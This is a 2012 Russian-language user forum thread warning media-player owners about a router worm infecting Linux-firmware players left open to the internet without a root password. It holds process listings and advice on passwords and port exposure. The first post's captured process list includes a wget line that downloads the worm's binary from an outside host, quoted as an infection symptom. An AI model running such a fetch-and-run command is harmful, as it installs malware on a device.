ОСТОРОЖНО: Сетевой троян!

ОСТОРОЖНО: Сетевой троян!

Postby FarVoice » 07 Mar 2012, 23:49

Добрый (ну или не очень) вечер всем!
Сегодня я наблюдал очень интересную картинку на плеере, выставленном в инет:
| +
top
last pid: 20087; load avg: 0.80, 0.94, 0.61; up 0+01:41:04 19:58:29
214 processes: 3 running, 210 sleeping, 1 zombie
CPU states: 4.7% user, 0.0% nice, 21.5% system, 73.8% idle, 0.0% iowait
Memory: 111M used, 7268K free, 92K buffers, 5712K cached
Swap: 32K free

PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND
2447 root 22 0 3400K 1668K sleep 0:32 4.97% 6.34% mipsel
2439 root 15 0 3400K 1668K sleep 0:13 2.05% 3.62% mipsel
19959 root 16 0 1768K 468K run 0:00 17.08% 3.62% top
19999 root 18 0 3400K 1668K sleep 0:00 0.03% 1.81% mipsel
244 root -2 0 802M 4564K sleep 0:00 0.02% 0.91% RPC_thread_V
20077 root 23 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
20087 root 23 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
20065 root 22 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
20039 root 19 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
20014 root 18 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
19974 root 17 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
19977 root 17 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
161 root 15 0 802M 4564K sleep 1:07 1.11% 0.00% MAIN
17 root 15 0 0K 0K sleep 0:39 0.65% 0.00% eth0
238 root 26 10 21M 2604K sleep 0:24 0.39% 0.00% php

Посмотрев процессы, я обнаружил там
| +
16211 root        272 S   wget -c http://cosini.uk.to/ppc -P /var/run
16584 root 1452 S /var/run/mipsel
16585 root 1452 S /var/run/mipsel
16586 root 1452 S /var/run/mipsel
16587 root 1452 S /var/run/mipsel
16588 root 1452 S /var/run/mipsel
16589 root 1452 S /var/run/mipsel
16590 root 1292 S /var/run/mipsel
16591 root 1292 S /var/run/mipsel
16592 root 1292 S /var/run/mipsel
16593 root 1292 S /var/run/mipsel
16594 root 1292 S /var/run/mipsel
16595 root 1292 S /var/run/mipsel

Глянул на место, откуда запускалось:
| +
~ # ls /tmp/run -l
-rwxr-xr-x 1 root root 202192 Mar 4 12:52 arm
-rwxr-xr-x 1 root root 262109 Mar 4 12:52 mips
-rwxr-xr-x 1 root root 266266 Mar 4 12:52 mipsel
-rwxr-xr-x 1 root root 194823 Mar 4 12:52 ppc
-rwxr-xr-x 1 root root 179576 Mar 4 12:52 sh


Итак, перед нами роутерный червь для линуксовых прошивок, который умеет запускаться на вышеперечисленных процессорах. Увы, но наш плеер в их числе.
Пока этот червь не делает никаких деструктивных действий, потому что просто не знает (пока) данную конфигурацию. Единственный вред - нагружает процессор и сеть. Но это только до той поры, пока хозяин червя не знает, что появилась новая ниша для распространения.

Бороться с червём достаточно просто:
не выставляйте незапароленные плеера в интернет!
Если всё-таки это нужен внешний доступ к плееру - установите модуль parole и задайте рутовый пароль! Особенно это относится к плеерам, подключенным напрямую к провайдеру и, возможно, через ppp соединение.

Если вы всё-таки поймали трояна (симптомы - тормоза, зависания, mipsel в процессах) - просто перегрузите плеер.

Не распространяйте заразу - предохраняйтесь!
ASUS O!Play R1 (amp_r12_vrtn), xTreamer Pro (amp_r12_vrt), xTreamer Prodigy (iNeXT 2.14 r2), IconBIT HDR12L (amp_r12_vrt), 3Q F425HW (xds42gl_7725_r3), MyGica A11 (mygica_m3_20121222)
User avatar
FarVoice
Администратор
 
Posts: 8572
Joined: 03 Sep 2010, 01:27
Location: Russia, Moscow

Re: ОСТОРОЖНО: Сетевой троян!

Postby Virtual » 08 Mar 2012, 08:02

модуль в moS зовется
Authorization
установит пароль как на вэб морду так и на телнет/фтп.
1. просто установить модуль
2. в вэб: Дополнительно - авторизация, задать пароль.

ЗЫ
.пароли: root admin 111 123. лучше не ставить 8-) . не поможет.
. так же рекомендую не пробрасывать службы плеера наружу по своим оригинальным портам: 20 21 23 80, и по портам: 8880 8080.

ЗЫЗЫ само собой тем кто не пользует PPP или не пробрасывает доступ к плееру из-за роутера, беспокоится практически не о чем ;)
марсы: HDS7 (смотрелка AMP скин vrt )
HDR12 AMP (обычно сервер с RAM 256 и 2 SATA диска 2T+)//но очень иногда оцифровка видео
XTR PRO(AMP, HTTP(S) NFS SMB FTP сервер +trans2.90 + 2 SATA диска 2T+
сатурны: XTR Prodigy, R6S(512Mb_NAND), HD900A(_MD*) прошивка
User avatar
Virtual
 
Posts: 6862
Joined: 01 Oct 2010, 17:17
Location: RU

Re: ОСТОРОЖНО: Сетевой троян!

Postby шлепачка » 08 Mar 2012, 17:08

ну вот подскажите мне плись нужна ли мне ставить авторизацию если
у меня инет приходит на роутер на каторам вкл фаервол
и уже роутер раздает инет АСУСУ и двум компам
Xtreamer PRO (amp_r12.5, шкура - vrt gui).
User avatar
шлепачка
 
Posts: 590
Joined: 03 Jan 2012, 22:07
Location: ЛНР

Re: ОСТОРОЖНО: Сетевой троян!

Postby FarVoice » 08 Mar 2012, 17:16

нет, не надо.
ASUS O!Play R1 (amp_r12_vrtn), xTreamer Pro (amp_r12_vrt), xTreamer Prodigy (iNeXT 2.14 r2), IconBIT HDR12L (amp_r12_vrt), 3Q F425HW (xds42gl_7725_r3), MyGica A11 (mygica_m3_20121222)
User avatar
FarVoice
Администратор
 
Posts: 8572
Joined: 03 Sep 2010, 01:27
Location: Russia, Moscow

Re: ОСТОРОЖНО: Сетевой троян!

Postby ordin » 10 Mar 2012, 11:49

Возможно, что троян "заточен" под андроид системы? Что посоветуете владельцам
плееров на андроиде, да и не только плееров?
asus R1, Wi Fi D-Link N 150; asus mini+
ordin
 
Posts: 750
Joined: 26 Dec 2011, 23:18

Re: ОСТОРОЖНО: Сетевой троян!

Postby FarVoice » 10 Mar 2012, 12:20

ordin wrote:Возможно, что троян "заточен" под андроид системы? Что посоветуете владельцам
плееров на андроиде, да и не только плееров?

то же самое - не выставляйте незапароленный плеер наружу 23 портом!
ASUS O!Play R1 (amp_r12_vrtn), xTreamer Pro (amp_r12_vrt), xTreamer Prodigy (iNeXT 2.14 r2), IconBIT HDR12L (amp_r12_vrt), 3Q F425HW (xds42gl_7725_r3), MyGica A11 (mygica_m3_20121222)
User avatar
FarVoice
Администратор
 
Posts: 8572
Joined: 03 Sep 2010, 01:27
Location: Russia, Moscow

Re: ОСТОРОЖНО: Сетевой троян!

Postby Sekator500 » 10 Mar 2012, 12:47

Можно использовать iptables в качестве фаервола, но надо ядро пересобрать с netfilter и модулем ip_tables
User avatar
Sekator500
 
Posts: 457
Joined: 11 Nov 2010, 00:13
Location: Киев

Re: ОСТОРОЖНО: Сетевой троян!

Postby Virtual » 10 Mar 2012, 13:08

Sekator500 wrote:Можно использовать iptables в качестве фаервола, но надо ядро пересобрать с netfilter и модулем ip_tables

да, но если не используется PPP соединения то абсолютно не нужно :). пароля на телнет и фтп заглаза...Linux системы очень устойчивы к доступу извне.

ЗЫ данный троян заточен под РОУТЕРЫ, на плееры он попадает по "счастливому стечению обстоятельств" :)
да и вообще червяк писан "пионерами", и расчитывает что ленивый юзер не менял дефолтных паролей на роутере иль оставил вообще без пароля.

ЗЫЗЫ если у вас в плеере нет средств установить пароль на root (ответ на это:)
ordin wrote:Возможно, что троян "заточен" под андроид системы? Что посоветуете владельцам
плееров на андроиде, да и не только плееров?

то просто не выставляйте плеер наружу за роутер, и не пользуйтесь PPP
марсы: HDS7 (смотрелка AMP скин vrt )
HDR12 AMP (обычно сервер с RAM 256 и 2 SATA диска 2T+)//но очень иногда оцифровка видео
XTR PRO(AMP, HTTP(S) NFS SMB FTP сервер +trans2.90 + 2 SATA диска 2T+
сатурны: XTR Prodigy, R6S(512Mb_NAND), HD900A(_MD*) прошивка
User avatar
Virtual
 
Posts: 6862
Joined: 01 Oct 2010, 17:17
Location: RU

Re: ОСТОРОЖНО: Сетевой троян!

Postby Dark_Diver » 11 Mar 2012, 16:35

О, он ещё жив ;)
Этому червю уже года четыре, если мне не изменяет память. О нём предупреждали и настоятельно просили менять дефолтные пароли на роутерах. Вроде, он линухово-мипсовые DSL-роутеры заражал, пользуясь дефолтными паролями или подбором по словарю.
Спасибо за предупреждение, буду знать, что наши плееры тоже уязвимы.
ASUS O!Play Air HDP-R3 (amp_r8_pohd), WiFi/DHCP - Edimax BR-6574n (802.11n открытый без криптования)
Dark_Diver
 
Posts: 6
Joined: 20 Nov 2011, 21:31

Re: ОСТОРОЖНО: Сетевой троян!

Postby asuser » 16 Apr 2012, 15:17

Добрый день!
Установил пароль, а при входе в web-интерфейс запрашивает еще и имя пользователя. Может быть оно какое-то по умолчанию? Подскажите, пожалeйста, как быть?
Asus O!Play HDP-R1 (amp_r6.1_hd2_blue)
asuser
 
Posts: 3
Joined: 05 Jan 2012, 23:39

Next

Return to ASUS

Who is online

Users browsing this forum: No registered users and 14 guests

cron